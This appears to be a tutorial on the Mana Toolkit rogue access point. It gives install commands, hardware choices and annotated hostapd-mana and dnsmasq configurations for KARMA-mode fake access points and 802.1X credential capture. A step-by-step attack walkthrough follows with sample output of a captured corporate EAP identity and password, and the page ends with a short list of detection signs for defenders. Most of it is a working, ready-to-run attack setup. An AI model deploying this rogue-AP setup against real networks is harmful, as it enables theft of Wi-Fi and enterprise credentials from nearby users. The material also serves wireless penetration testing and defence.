Mana Toolkit

What Is Mana Toolkit?

Mana Toolkit was created by SensePost based on research by Dominique Bongard. It addresses the core problem with traditional hostapd: the legitimate AP has to actively broadcast the SSID that clients are looking for. Mana solves this by acting as a "hotspot with everything" — it accepts association attempts for any SSID that a nearby client is probing for.

Key capabilities:

• KARMA mode: Responds to any probe request with a matching SSID
• Runkarma: Actively probes for saved networks, then responds to them
• EAP imitation: Imitates enterprise RADIUS servers to capture 802.1X credentials
• Credential capture: Built-in logging of WPA handshakes and EAP identities
• Out-of-range attacks: Can capture handshakes from networks the attacker can't reach

Installation

On Kali Linux (Pre-installed)

$ sudo apt update && sudo apt install mana-toolkit hostapd-mana

On Raspberry Pi (Raspberry Pi OS)

$ # Add the Kali repository for Raspberry Pi ARM builds
$ echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" \
    | sudo tee /etc/apt/sources.list.d/kali.list
$ sudo apt update && sudo apt install kali-linux-wireless hostapd-mana dnsmasq

Hardware Requirements

• Raspberry Pi 3B+ or 4 (Pi 4 recommended)
• Alfa AWUS036ACH or AWUS1900 (RTL8812AU or RTL8814AU chipset)
• 32GB+ microSD card
• Power bank (20,000mAh+ for portable deployment)

Configuration Files

$ cat /etc/hostapd-mana/hostapd-mana.conf

# Basic Configuration
interface=wlan1              ← WiFi adapter for fake AP
driver=nl80211
ssid=Free_WiFi               ← SSID to broadcast (or leave for KARMA)
channel=6
hw_mode=g

# KARMA / Runkarma Settings
enable_mana=1                ← Enable KARMA mode
mana_macaddr=00:11:22:33:44:55  ← Spoofed BSSID
mana_ssid_short=1              ← Match SSID length
mana_cred_capture=1            ← Capture 802.1X credentials

# EAP Settings (for enterprise networks)
ieee8021x=1
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP

$ cat /etc/dnsmasq-mana.conf

interface=wlan1
dhcp-range=192.168.1.100,192.168.1.200,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
address=/#/192.168.1.1
log-queries
log-dhcp

Step-by-Step Attack Walkthrough

# Step 1: Start Mana Toolkit
$ sudo ./start-mana.sh wlan1 wlan0

[mana] Starting Mana Toolkit on wlan1 (AP) and wlan0 (internet)
[mana] internet interface: eth0 — sharing via NAT
[hostapd-mana] Starting hostapd-mana
[dnsmasq] Starting dnsmasq
[mana] KARMA mode enabled
[mana] Mana is running — waiting for probe requests

# Step 2: Monitor captured credentials
$ tail -f /var/log/mana_cred.log

[Mana] EAP identity: john@acmecorp.com
[Mana] EAP password: CorporatePass2026!
[Mana] BSSID: 00:11:22:33:44:55 ESSID: ACME_Corporate
[Mana] Timestamp: 1744012847

How Defenders Detect Mana

• WIDS signature: Detection of probe responses from multiple SSIDs on a single BSSID (KARMA fingerprint)
• BSSID anomalies: APs appearing with MAC addresses that don't match vendor OUI patterns
• EAP identity capture: Unusual EAP responses from non-RADIUS servers
• Channel utilization spikes: Mana APs often stay on one channel — unusual for legitimate multi-AP environments